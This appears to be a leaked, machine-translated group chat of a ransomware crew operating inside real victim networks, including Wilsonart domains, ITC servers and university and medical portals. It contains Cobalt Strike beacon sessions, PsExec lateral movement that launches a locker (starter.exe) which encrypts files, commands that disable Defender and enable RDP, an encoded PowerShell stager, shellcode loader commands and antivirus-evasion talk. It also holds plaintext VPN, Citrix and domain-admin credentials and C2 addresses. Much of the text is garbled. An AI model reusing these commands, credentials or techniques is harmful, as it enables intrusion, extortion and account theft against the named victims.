I don't think we'll be able to close it today
10 domains
+ we need to catch the AB and spheres creeds somewhere...https://www.solarwinds.com/it-security-management-тооІѕда is not an AB at all...?[ ](https://mediaeveryone.com/group/wilsonart-com?msg=9dZhAJKePR46j6kT3) .evil shit?
+ this is the domain where we are.
TECHNISTONE.LOCAL - can't get through, no overlap of users and users/groups from other domains with permissions
WI.RWP.COM is some kind of a dead domain, just wine 2003
```
WILSONART.COM +
CN.WILSONART.COM +
RALPHWILSON.COM +
ARBORITE.COM +
POLYREY.NET +
EU.WILSONART.COM +
UK.WILSONART.COM +
BUSHBOARD.CO.UK +
SLF.LOCAL +
RESOPAL.LAN +

TECHNISTONE.LOCAL no intersections
WI.RWP.COM 2003 mb old/inactive domain
	              

POLYREY.COM Quarantined
RESOPAL.GER Quarantined
``Lists of servers/arms from all domains
```
c51ecc215ab741ba8eb53c323bc8c277
```.```
beacon> shell ping polyrey.com
[*] Tasked beacon to run: ping polyrey.com
[+] host called home, sent: 47 bytes
[+] received output:
Ping request could not find host polyrey.com. Please check the name and try again.
```
```
beacon> shell ping resopal.ger
[*] Tasked beacon to run: ping resopal.ger
[+] host called home, sent: 63 bytes
[+] received output:
Ping request could not find host resopal.ger. Please check the name and try again.
``````
WILSONART.COM +
CN.WILSONART.COM +
RALPHWILSON.COM +
ARBORITE.COM +
POLYREY.NET +
EU.WILSONART.COM +
UK.WILSONART.COM +
BUSHBOARD.CO.UK +
SLF.LOCAL +
RESOPAL.LAN +

TECHNISTONE.LOCAL no intersections
WI.RWP.COM 2003 mb old/inactive domain
	              

POLYREY.COM Quarantined
RESOPAL.GER Quarantined

The new one is not a new koba, but the new koba is a new koba, and the new koba is a new koba, and the new koba is a new koba.
yesterday there were two new ships and in the two new ships nothing flies really) well, and in the new ships it flies) with the commands and stuff like sysinfo the server behind the dk and whether it has an open off-site)) yes, two ships were open, I chose https, but it comes from another ship) to another ship or what?)you on which one you picked up what?)your listener graph is empty so to speak)) what listener did you pick up?)` *** 23623423 has joined.i'm fucked too) lol)[ ](https://mediaeveryone.com/group/wilsonart-com?msg=qWzDq9uNAzyugQTq7) what dk was 2016 in the new at least someone raised a new listener? that one was for dk also 12? dll from the new coba is the same and so and so you said you ran on 1 server on the intranet through dk?[ ](https://mediaeveryone.com/group/wilsonart-com?msg=Gi5oBnXfNwZvCKHaY) from the main can not see, from another can see on dk and ran[ ](https://mediaeveryone.com/group/wilsonart-com?msg=2tfBQPqopYGz2bZyZ) yes `resopal.lan
```
 beacon> shell dir \\172.22.198.11\C$
[*] Tasked beacon to run: dir \\172.22.198.11\C$
[+] host called home, sent: 53 bytes
[+] received output:
The trust relationship between the primary domain and the trusted domain failed.

``Or.
regsvr32 file.dllStart:
rundll32 file.dll, StarkWhite command to run dll Depatam where you run for dk was also 12? ddl can not see the server directly? tried, dll seemed to work on the server from this domain, but no session[ ](https://mediaeveryone.com/group/wilsonart-com?msg=zBMzgRhYxLtjfEr7S) through dk further get through?seesvneshku see? yesterday one threw in #toolsranel give more sysinfo these servers i am purely testing and ruling out options) i will certainly try, but purely my opinion) that it is not in the cob and that our dll does not work on these 2012 dk try here clean coba ``
108.62.12.143
https://askside.com
----------------------------------------------------------------------------------------
104.194.10.161:53256
KtdyhCtQUR4qWj0JfZd45Gn7ivsiLJ5sILi
no, only simanteclose it already cut off everywhere AV through the admin and go quietly, there is something besides AV? it does not show as AV, maybe a scanner or a sensorkak how to close it) to the domain to pass))) everywhere turned off the possibility of complete disabling of AV for what session?although there is a risk that the admins will see the break with the agent no right to completely disable the protection and pull the bindpipe and raise it back? but i noticed that the crash only on 2012 on those that have worked
i added it to exceptions and ran it after the avs passed - the session came from the dll is not deleted but crashes
our dll strayed, added to exceptions, it runs and crashes after the avp went through me? on some dk the dll started after that and the session came flying added dll to exceptions avp as a consequence crashes most likely detects shellcode and cuts out of the dll came by rdp
ran the dll
window popped up - operation stopped.... how did you determine what was crashing? but this is risky and you need to kill everything at once as an alternative to kill simantec (it is administered from the main domain)
and try to bindpipe other domains[ ](https://mediaeveryone.com/group/wilsonart-com?msg=KoqSvFWfFHfCdEq3Q) we need to solve the problem now, otherwise we won't be able to close it today.
14 domains in total
4 have sessions
7 have access, but no sessions from there
>description: Veeam Backup Server
>dNSHostName: bod01-bkp01.eu.Wilsonart.com
``````
>description: Vcenter Server
>dNSHostName: bod01-vce01.eu.wilsonart.com
``````
>description: Veeam Backup Server
>dNSHostName: dcveeam01.Wilsonart.com
``````
>description: VMware vCenter 6.0 Server
>dNSHostName: dcwas79.Wilsonart.com
```
 
```
>dNSHostName: nas_signature.polyrey.net
``tl1 our dll crashes on 2012window, I turn on yesterday's dll from depaav does not see them there is also WI.RWP.COM, there everything on 2003 and arboright crashes after starting uk and eu dlls on 2012, there are clean dlls on startup crashingsessions do not stretch all that _NTLM, taken remotely, except wilsonart.com pair seem to be in quarantine, but pings all the way through it is active?
uk.wilsonart.com
arborite.com
eu.Wilsonart.com
resopal.lan
polyrey.com
resopal.ger
``go to closingh polyrey.net\adm-cavailj 99f09cbd168ec7f38bf4981a884f082cWe all have a good weekend on Mon by 1pm remove files in slipstreams well worth a try*try msf try? different loads, ports
i ask if anything, do not waste time)@user3 already a few days it bangs it sits next to you therea information as i understand by tpsh no?:#sisd-net let's leave for another day today until 12:skull:so it is already dead)there stall should be up to 40 seconds11 minutes pingingnyayaat something like ACADEMIC.NET should not see there your in tpsh flew to user3 and what to do with it then?i can't see how to do anything else with it!) how to spam it from usera (i'll try it in ptsh ghbktntkf jn .pthf 9 and no other variants? it's probably portne, it does not bitemakafitam still try what av? there are a couple more rpn:disappointed:no there are no avs did not start it, try different options cobalt load - the session does not come
there are any other options to get the session? or AV cuts the connection as an option - there is a whitelist for IP on the TCP connection pinged but the process hangs and no session in general summing up not the fact that there is no output traffic on the 443 portd)
I have not checked...copied from the Russian-language resource? and I see there ?????? 443 ?????????????dir=INlocalport 443 action=allow dir=IN you use a rule for the firewall and for that matter if it is not there, then the software on your machine does not have a software that keeps 443 open-most likely there would be a web server if the netstat was 443 port local open 139 445 and so e shows just open ports more role flag-anetstat -nikak, assumed
the netstat does not have it how did you determine that 443 is closed? daleenet) the question about the busy port is relevant? in other words, the current machine through 57431 port makes a request to 172....195:443 on the right remote + port as you see on the left is the local address and port is the netstat hat```

Active Connections

  Proto Local Address Foreign Address State
``that is, the port is busy with your coba? `s external[ ](https://mediaeveryone.com/channel/general?msg=B2vsb4MHfdZiYoRMP) ip 172. what is it? read[ ](https://mediaeveryone.com/channel/general?msg=AHk7aiQJYEZN9R4Tw) read the last 30 messages, well, we need to change the port or redirect
the session on 443 by idea should not come to me on what? all responded? on cmb link445 on cmb, it turns out, too i have not tried, but i think on the 80th you can raise the session on me on i zumeroka you do not smoke? ok i will wait all kureyatsko rather than yes to long they?i'm in my office and i see that they're not there i have all "online" status some are away for now@user8 is responsible for all? won't come[ ](https://mediaeveryone.com/channel/general?msg=6Pib9yhKR6fKGMYDj) this[ ](https://mediaeveryone.com/channel/general?msg=vkaZGMZbNa7du9uhB) or this[ ](https://mediaeveryone.com/channel/general?msg=rEMML3ycEFazRDrxT) this one which one?
 Can you tell me please - if the 443 port is closed, the session will not come to the coba?
```
+ question to all above we have two people in the team) not we have https domains and the port is 443
so it's more a question of what to do with it if the port is closed)what? @all you a questionPlease tell me - if the 443 port is closed, the session will not come to the cob?
https://lab.devry.edu/vpn/index.html D41111543 Carolann#05302009
https://lab.devry.edu/vpn/index.html d40016842 Jackson3
https://lab.devry.edu/vpn/index.html d01677853 Lilly535
https://lab.devry.edu/vpn/index.html d01480444 aDv!9659
```
@user9 do you have 2 more nets to work with?
https://vpn.floridapoly.edu
```
I'm scouring the subsnets in search of dk - check on zerologontak, who's doing what write to the groupsnetsIn ptsh you can shove exeshniki into memory like in kob? I still have problems with dedik - no++? everyone has work * yesHey all come on:space_invader:with such files will kapec long lol172.17.0.13
172.17.0.8
```
The network path was not found.
```
```
Lost = 4 (100% loss),

The remote-exec psexec is the only way to get the files to be encrypted, but it will take a long time to get them to the network, so make sure the locker process is not dead.
beacon> remote-exec psexec 10.10.20.131 C:\starter.exe
[*] Tasked beacon to run 'C:\starter.exe' on 10.10.20.131 via Service Control Manager
[+] host called home, sent: 2005 bytes
[-] Could not start service c122355 on 10.10.20.131: 5
` ` + on 1 i.e. one zamaplenom? the last half an hour, I only worked on one [ ](https://mediaeveryone.com/group/itc-us-com?msg=9oMDn23BwxRksJAqJ) and you can go on the servers are + and all servers) well, now we are waiting for all zamaplenym note appears where the file R3ADM3.txt
on the servers? so it's all quiet on the mapped ones+norm the rest?
10/21/2020 10:01 PM 717 R3ADM3.txt
``13 just seems like you have more than 10 may not go try to run the build if all are plugged in other disks are not mapped anywhere other than C? mine too +[ ](https://mediaeveryone.com/group/itc-us-com?msg=hPjLWs4GnypjiiRGo) ``
beacon> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.


Status Local Remote Network

-------------------------------------------------------------------------------
OK N:        \172.17.0.13\C$ Microsoft Windows Network
OK O: \10.10.0.129\C$ Microsoft Windows Network
OK P:        \10.0.10.143$ Microsoft Windows Network
OK Q:        \10.0.10.83\C$ Microsoft Windows Network
OK R:        \10.0.10.163\C$ Microsoft Windows Network
OK S:        \10.0.10.129\C$ Microsoft Windows Network
OK T:        \\172.17.0.8.8\C$ Microsoft Windows Network
OK U:        \10.10.20.126$ Microsoft Windows Network
OK V:        \10.0.10.111\C$ Microsoft Windows Network
OK W:        \10.10.20.131\C$ Microsoft Windows Network
OK X:        \10.10.0.135\C$ Microsoft Windows Network
OK Y:        \10.10.0.117$ Microsoft Windows Network
OK Z:        \10.0.10.116\C$ Microsoft Windows Network
The command completed successfully.

``````
10.0.10.116
10.10.0.117
10.10.0.135
10.10.20.131
10.0.10.111
10.10.20.126
10.0.10.126
172.17.0.8
10.0.10.129
10.0.10.163
10.0.10.93
10.0.10.83
10.10.0.103
10.0.20.100
10.0.10.143
10.10.0.129
10.0.10.9
172.17.0.13
And that's 10k you can just add them to the current 5 servers
10.0.0.25
10.0.20.222
10.10.0.118
10.0.10.131
10.0.0.24
10.0.10.103
10.0.10.96
10.0.10.101
10.0.10.134
10.10.0.131
10.0.10.133
10.0.10.35
10.0.20.231
10.0.20.83
10.10.0.134
10.0.10.168
how many is it?[ ](https://mediaeveryone.com/group/itc-us-com?msg=BFy8ZYMKrwdTcqrGF) we put everything on the system32 starters even no unleash on the 5 remaining servers, then nail the dkis then run the classic dpi on all nk through psecs no more than 10 active connections as i remember take some part of it on no unleash in this server10.0.0.7 it in kobe karsnyone not touched + on servers *here, get it? 4 leave it at the end of the dk + 1 servera normal on the servers seemed to go
```
Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 10/13/2020 11:03:20 $Recycle.Bin
          dir 10/21/2020 21:30:41 Config.Msi
          dir 10/21/2020 21:30:40 Deskinfo
          dir 07/14/2009 01:06:44 Documents and Settings
          dir 10/21/2020 21:30:41 ECI
          dir 10/21/2020 21:30:41 Godlan
          dir 10/21/2020 21:30:40 inetpub
          dir 10/21/2020 21:30:41 MultiLink
          dir 10/21/2020 21:30:40 PerfLogs
          dir 10/21/2020 21:30:41 Program Files
          dir 10/21/2020 21:30:41 Program Files (x86)
          dir 10/21/2020 21:30:41 ProgramData
          dir 10/21/2020 21:30:40 Projects
          dir 10/21/2020 21:30:45 RDL
          dir 10/21/2020 21:30:40 Recovery
          dir 10/21/2020 21:30:40 SmartSystems
          dir 10/21/2020 21:30:40 SQL_Docs
          dir 07/11/2014 13:15:08 SSTemp
          dir 09/03/2018 21:01:40 System Volume Information
          dir 10/21/2020 21:30:45 Users
          dir 10/16/2020 13:56:57 Windows
 1kb fil 10/21/2020 21:30:40 .rnd.GQQNX
 13kb fil 10/21/2020 21:30:40 Datacollectors.db.GQQNX
 1mb fil 10/21/2020 21:30:41 Infor803ERPInstall.log.GQQNX
 0b fil 11/27/2018 22:17:27 Inventory.db
 1kb fil 10/21/2020 21:30:41 MAPICSCDInstall.log.GQQNX
 680b fil 10/21/2020 21:30:40 mode.txt.GQQNX
 21gb fil 10/16/2020 18:20:56 pagefile.sys
 717b fil 10/21/2020 21:30:40 R3ADM3.txt
 185kb fil 10/21/2020 21:30:27 starter.exe
 4kb fil 10/21/2020 21:30:40 VSM000.IDX.GQQNX
``then do the rest of the servers do not run for some reason too? 20 servers
alive 18
of them 4 - dkv kobe all dragged how many servers and all? such instances occur and the solution is actually above)ah, well, it makes sense)and all his disk to mask the server where there is no such a thing ``
C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
ERROR: Access is denied.


C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
ERROR: Access is denied.


C:\ProgramData>reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
ERROR: Access is denied
or can we leave them alone? ok, on one server there are branches protected, so if there is a VL then it will not work anywhere under the DA token does not even need to mount anything) specify a list of waysflag through -p akfuberem simply from servers under the DA token why run on farms? on servers if started - this is enough and there check on a sample basis take another 3 farms` ``
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com


[+] received output:
The system cannot find the file specified.
Connecting to 10.0.20.222...
Starting PSEXESVC service on 10.0.20.222...
Connecting with PsExec service on 10.0.20.222...
Starting C:\starter.exe on 10.0.20.222...
PsExec could not start C:\starter.exe on 10.0.20.222..:
``````
beacon> portscan 10.0.20.222 3389 none
[*] Tasked beacon to scan ports 3389 on 10.0.20.222
[+] host called home, sent: 93245 bytes
[+] received output:
Scanner module is complete
``I think the rdp should turn on...``
[*] Tasked beacon to run: wmic /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
[*] Tasked beacon to run: wmic /namespace:\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
[*] Tasked beacon to run: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
[+] host called home, sent: 472 bytes
[+] received output:
The operation completed successfully.
``doesn't give a token;``
	* Username : egl_admin
	 * Domain : ITC
	 * Password : E@gle@x1s3030
´´just won´t connect to the pc without an account, we left the old one at egl_admin we changed the prółi Yes you are under whom7 not connect[ ](https://mediaeveryone.com/group/itc-us-com?msg=eLf3auQNBPDqNABtu) did not work? if it does not work wl on armas@user9 and try to run the exe from the root try to run it from the root, try also under yes I am not allowed to come here ´´´
beacon> shell c:\explorer.exe
[*] Tasked beacon to run: c:\explorer.exe
[+] host called home, sent: 46 bytes
[+] received output:
Access is denied.

``I'm wondering what's up with that, too maybe whitelisting the appliques?
shell starter.exe
[*] Tasked beacon to run: starter.exe
[+] host called home, sent: 42 bytes
[+] received output:
Access is denied.


```
this is from the roottry it from the root some bullshit
beacon> shell WINDOWSSystem32.exe
[*] Tasked beacon to run: WINDOWSSystem32.exe
[+] host called home, sent: 50 bytes
[+] received output:
Access is denied.

beacon> pwd
[*] Tasked beacon to print working directory
[+] host called home, sent: 8 bytes
[*] Current directory is C:\
beacon> whoami
[-] Unknown command: whoami
beacon> shell whoami
[*] Tasked beacon to run: whoami
[+] host called home, sent: 37 bytes
[+] received output:
nt authority\system

``root C''
test pleasefolder in the ps sheet is not lit any aBtry the root of the drive also writes access deenedtry another folderoffinloskarr and does not delete but blocks the startup on the servers we winndef by the batnoy chopped by the way ``

beacon> shell dir 1.exe
[*] Tasked beacon to run: dir 1.exe
[+] host called home, sent: 40 bytes
[+] received output:
 Volume in drive C is OS
 Volume Serial Number is D85B-9A4C

 Directory of C:\WINDOWS\System32

10/21/2020 09:02 PM 189,440 1.exe
               1 File(s) 189,440 bytes
               0 Dir(s) 190,692,196,352 bytes free

``````
beacon> shell 1.exe
[*] Tasked beacon to run: 1.exe
[+] host called home, sent: 36 bytes
[+] received output:
Access is denied.

``Let's cut it up.....webroute if vindef is off then logicales the usual jump logged in as domain admin on dcvode by the way vindef is offvote so with rdp will go well```
For /f "tokens=*" %%a in (c:\tmp\ComputerList.txt) Do psexec \\\%%a -i gpupdate
either I didn't give him /force enough, the point is that either psec gave him all the parameters after the program name I can kind of see he's got a process with a direct pointer to run under a token, I tried different things, why shouldn't I run it under a token?
shell PsExec \\10.0.20.222 -d -s -h gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030
```
that worked, isn't it gpupdate's own parameters?
gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030
``I think there's something wrong with it``.
gpupdate.exe 12492 Services 0 4,424 K NT AUTHORITY\SYSTEM 0:00:00

``````
beacon> shell PsExec \10.0.20.222 -d -s -h gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030
[*] Tasked beacon to run: PsExec \10.0.20.222 -d -s -h gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030
[+] host called home, sent: 131 bytes
[+] received output:

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com


[+] received output:
Connecting to 10.0.20.222...


Starting PSEXESVC service on 10.0.20.222...


Connecting with PsExec service on 10.0.20.222...


Starting gpupdate on 10.0.20.222...



gpupdate started on 10.0.20.222 with process ID 46196.

``blocks startup10.0.20.222 give ip arm+aver webroot and only?but still does not givebatnik worked on shutdown vindefa tried on a couple of armas startup starter - do not givelokaet servers, workstations can be daunts - there are almost never any processes that hold important files + the batcher worked to shutdown windup on the servers and then dkpot everything else on the servers because no firewall rules on remote managment on the client machines have been turned on all the machines ishell PsExec \\* -d -s - error there why psexec?why don't you update it with dk gpo?
beacon> shell PsExec \\* -d -s -h gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030
[*] Tasked beacon to run: PsExec \\* -d -s -h gpupdate /force -accepteula -y -u itc.local\egl_admin -p E@gle@x1s3030
[+] host called home, sent: 121 bytes
[+] received output:

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

Enumerating domain...
A system error has occurred: 2184

``cobalt crashes which is yellow you can not enter into the interface with ITC-DC-SVR01[ ](https://mediaeveryone.com/group/itc-us-com?msg=qX3zp9exDqEMwuc5q) here it is my t,exfz stinking give more access to the coboo where to do[ ](https://mediaeveryone.com/group/itc-us-com?msg=2fCSwKCMjzbrqCNBG) daschae to reboot or I can give more vpns can now see what you need (the second was not (patient in the note is mentioned as an identifier in the name of the "code" bildan, the file name in the archive if so, here is
``SDIJ*FHg78SDFGTI&SDtARTE%YET`` do you mean the archive password?
```
uIYeJR0AY0hM9wCq0pK0S0fSgUFvquxwDi1Ieh3X093RPVdLcow9OB4lOmLDzISp
``boys, do not remember what was the build code of the locker? If you do not see it, it does not see in 99 percent of cases, if it gives the result - then the machine sees the DC. Username: SBolley. Password: thisduckingsucks!02 `Working on what is the jam? LA no. Looking for where the current polzak admin in the subnets from the sysbetstsuspasiblE I have nothing, try the other loads and work through ps` https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx` in `https://paloca.cernerworks.com/citrix/prodweb/ dr1434 dr14349773` yt pfgecnbnm cmd and ps`sharecare.com` - error when logging into citrix
`mch1.org` - no access at all anywhere except medical app, where login and password cannot be entered
`protransport.cloud.com` - only have access to the freight application, the login details do not fit
``unf.edu `` - now in operation, removed adinfo, DA, DK, kerbs transferred tl2, removed the ball list, now network walkthrough and removal of mimic+hashdampanet gives you a hookup from the ip dedic
```
https://login.medimizer.net/rdweb/pages/en-us/login.aspx
```
Citrix doesn't lead anywhere except for admin sites, there is a VPN tunnel on the gateway but no one can see any computers on the net
```
https://liveopsnation.okta.com/app/citrixnetscalergateway_saml/exk25j1wbvpyk8bfl2p7/sso/saml
```
in work - about the progress wrote in the confr
not much progress in words, not enough PCs
at the moment it is /16 on 445
```
https://mcloud.mgrmedu.com/rdweb/pages/en-us/login.aspx laci.riley@mgrmedu.com
I can't get anything to work, closed by the admin cmd admins please write about which domain it's about and what's wrong or so i don't understand how i can try eleveit kite via that tool, tomorrow i will try to do it via deadic
https://paloca.cernerworks.com/citrix/prodweb/ dr1434 dr14349773
What was wrong with the first one? @user3 I have 2 accesses written down on youI have nothing, I'll try the other loads and work through pswhat went wrong or did it work and what progressSISDNET - continue to `scan subnets from sabnets - looking for where the admin polzak ` straight on all their current accesses that bralitak well I would still first remove the hell, kerb, sharpfinder. the current tour allows if the AV is not too biting8443 port still wanted to write about it) rev_tcp_rc4 very good from msfCheck different ports
rev_http
rev_https
80/443/53I would have played with listener and portsada i think here check in kobu and in armagate 2 loads and you can understand that not pull)not once rolled sessions in armagate info unloadnado had to work under current conditions, remove kerb etc if not allowed a clean dll then it blocks the traffic is not there in loadsTried to run different loads. did not work till 11 work, at 11, the total for 10 minutes and go home at 11, wrap it upwrite in groups that done pishite in conffor where the problem[ ](https://mediaeveryone.com/channel/general?msg=GBuGjFSkRq2fukyFx) in general with my session is sad
i run a tool - it works and session flies away on others not i ran - says that on the machine where i have access to admin spheres but he does not have rights why did you run toshairfinder? check if polzak has admin rights to other machines ? i have no progress with mgrmedu.com
polzak can't get it up.
I'm surfing the net.
+ sessions keep dropping - avrubit checked with scanner ms17 the only alive server 2008 - dead
took the kerbs off the trusts and gave them to tl2
i'm thinking what to raise i'm trying to get the system what results do you have? it's dirtier than the ground)yeahlfcobes? load what? i'm running `https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj colorblue76!` in cmd/ps load ``powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBMAFYAWAA2ADMATwBpAFMAaABiAC8ASABQADgASwBQAHEAUgBLAHEAVABFAHUAUgB1AFAARQAyAFUAcgBWAGcARAB4AEUAZwBTAGcAUABYADcAbQBwAFYAQQB1AHQAUQBYAGsASgBqAFkAaAAzADUAbgArAC8AQgA5AFQAYwB6AEUANQBtAGQANgBwADIAMQB5AHIASwA3AHUAWQA4AGYAKwBmAFIAQgB3AE8AVABHADQAUABFAHIAawAzAFUAMABNAEgAVQB6AFEAVABIAGkAUgBzAEcAMQBHADIAbABjAHMAMgBIAE0AcQBFAGUAcQBLAC8AVgB5AGkAbwBOAGIARgBJAGMARgA0AHUAWABOAFMAWQB2AFUAUgB6AGEATAA4AGgAeABZAHAAdwBrADEASgArAFYAcQB4AEcASwBrAFUALwBWAHIAdgBjAG8AZgB2AEYARABKAC8AVgB3AG4AUwBvADMAQgBTAEYAMgAwAGgAagBUAFYAMQBlAFYAcQAvAEkAbwBEAFIASwAwAHcAaQA4AEIASQB1ADQAZQB2AC8AaQBZAHYASQBaAE8AQQBvAHAAcQBUADIAdwBVADgAYQBHAFAAMwBPAEQANQB5ADUAZABlAEcAcwBjADQASQBLAGQAOQBRADgASwBFAFQAUgBMAHMATAB6ADAAWABKAHoAVwBhACsAawBaAE4AWAAzAEcATQBiAHgANgBYAEcAMgB3AFQANgBrAC8AcQArAHEAVQBoAGUAZQBFAFMAZQBXAGUAeQB2AEkAZgBzAFYAMwBDAEkARABaAHoAaQBuAFIATABhAHEAUABDAGcA


``The process is created, but the session does not come amsi bypass script blocks as malwarekak malware script[ ](https://mediaeveryone.com/channel/general?msg=CdzqBnJxqPN8YbhkA) I tried it, it blocks avi still, I repeat I don't know how many times, remove your tules and any of your files from the system, remove the kerberostom if rubeus blockutpoyadalashev further it depends on you how you will raise them) you have the whole githab) ability to work with cmd, download files and so on, but how to raise privileges through this tool?if there's no file, there's no kerbs either, right? when you remove the kerbs, send it to @tl2 and duplicate it in the conf@user7 in the conf@user9 conf, please@user9 made the conf thank you@user4 duplicate it in the conf[ ](https://mediaeveryone.com/channel/general?msg=bHAEAFsYYCqokD8Bf) mgrmedu.com me, I threw tl2 can chat, you can pour rubyuskstatino no one else? no one else took kerbs? take one just for yourself you have 4 dedicates` ``
https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj colorblue76!
``This one here requires an old sitrickets weight, I download it and when I install it it says to me like: It's not really a new version? Put the newest. If I tear down the new one that is standing the guys can not use the shellcode in the privateIn @tl1 there is a shellcode builder so it starts like this ``.
rundll32.exe C:\path\to\file\file.dll,entryPoint
regsvr32.exe /s C:\path\to\file\file.dll
``this is the FUD``.
./shellConcatination --source=shellStarter_llvm_x64.dll --target=x64.dll --addBin=x64.bin -self -keep

``````
Doing a cryptor raw to exe session does not come.
```
It opened...I had a message that the site does not support tls 2.0 or change the default gateway to another one just to check if it is available. Reset it completelyfresh? What browser do you use? Does it show the page? It's ok. The session is not coming from the default gateway. https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx is just a white screen, so no valid CREDES?
https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj Colorblue76!
``There's no connection here?
phoen1xasp.com
``````
 https://paloca.cernerworks.com/citrix/prodweb/ dr1434 dr14349773

``Don't run cmd, powerShell, taskmgr everything is mocked up admin then you are the quietest in the job and why do you need a replacement writeLf you need anything else?
https://mcloud.mgrmedu.com/rdweb/pages/en-us/login.aspx laci.riley@mgrmedu.com MeduLR@1234
```
@user9 replacementdavaynetwebuy I can give you more access, it may work faster there than here
```
beacon> portscan 172.0.0.1/24 21,22,23,25,53,80,81,110,119,137,139,143,443,445,465,587,993,995,1080,1194,1433,3306,3389,5500,5800,5900-5906,8080,9001,9030,9050,9051,9090,9091,9100 icmp 1024
[*] Tasked beacon to scan ports 21,22,23,25,53,80,81,110,119,137,139,143,443,445,465,587,993,995,1080,1194,1433,3306,3389,5500,5800,5900-5906,8080,9001,9030,9050,9051,9090,9091,9100 on 172.0.0.1/24
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '172.0.0.60' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '172.0.0.97' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.70' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.111' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '172.0.0.168' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.186' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.188' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.187' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '172.0.0.237' is alive. [read 8 bytes]

[+] received output:
172.0.0.188:443
172.0.0.187:443

[+] received output:
Scanner module is complete
``Check Web Ports'' somewhere in the vicinity
beacon> portscan 172.0.0.1/24 445 icmp 1024
[*] Tasked beacon to scan ports 445 on 172.0.0.1/24
[+] host called home, sent: 93245 bytes
[+] received output:
(ICMP) Target '172.0.0.60' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '172.0.0.97' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.70' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.111' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '172.0.0.186' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.188' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.187' is alive. [read 8 bytes]
(ICMP) Target '172.0.0.168' is alive. [read 8 bytes]

[+] received output:
(ICMP) Target '172.0.0.237' is alive. [read 8 bytes]

[+] received output:
Scanner module is complete
```:ok_hand:at 24 scan for DNS sabnetupo put scan /16 of your ip is on the interface check ipconfigda alive it seems to have fallen offavpn alive? and ping does not pass to the ip that ip scanner gave[ ](https://mediaeveryone.com/channel/general?msg=zhxKp8Y2oYYWBd72t) does not work to move anywhere
napn streaked but in the subnet 172.169.16.1-172.169.17.254 portskan does not give anything took the firewall in their hands and blocked, okzablochal rdp connect why is it? kaspersky nailed itawn your addicts second so he probably and blocked the entrance[ ](https://mediaeveryone.com/channel/general?msg=XNXcefd8b4k5Mz7n8) yes, citkrix will not let without edr and windef was a palsy to include) created[ ](https://mediaeveryone.com/channel/general?msg=4kBFYh2BFCPu3ruWM) there's a session did you have kasper on the hard disk? OK, I'll rewrite it[ ](https://mediaeveryone.com/channel/general?msg=iXam5Ja66xMDeu8gL) no, it was a text file. os, what did you do, what you got, what was expected, what's the problem and now I took off the toolchain before I got thrown out - I took off by hand - if the hands - is it an archive? so I do not understand, you took it off by hand or through toolchain? i did not finish downloading - more than 200 meters file was `` ``
https://vlab.unf.edu/vpn/index.html N01447311 Commercial5207!
```
@user8 replacement from tulchain adf returned 11 users and how many without tulchain? maybe it's okay? or maybe it's a bug? from tulchain - it returned 11 users in adfind, and I downloaded the file 238 MB there is nothing at all?[ ](https://mediaeveryone.com/channel/general?msg=t33YpDhLCbMWQiLaW) there is only one application and these creed him not catalyze more, take hell, take the access and get into the network who does that) creed citr....and the record of persist from the registry disappearednu I put on my coba persist where did you get dll to fix? ummy everything disappeared, even dll to fix there is nothing there av or something? strange in the appdata from the usera where you left them? there is strange.... i just re-logged through cirta, re-session to myself, and no my files there already ... how so? burned by the demons? ah, good come back i already.then he had already hell info take away someone @user4 in the net so well, you now have 3 dedicates and wpn not turn off even after reboot most likely flew a dedicate for wpn means from a portal with flash config) well go to the link he invited himself to download from the portal?installed from where? there only citra installed and all, not even configured it put vpn? i and user 9 on it worked ddik not connect to 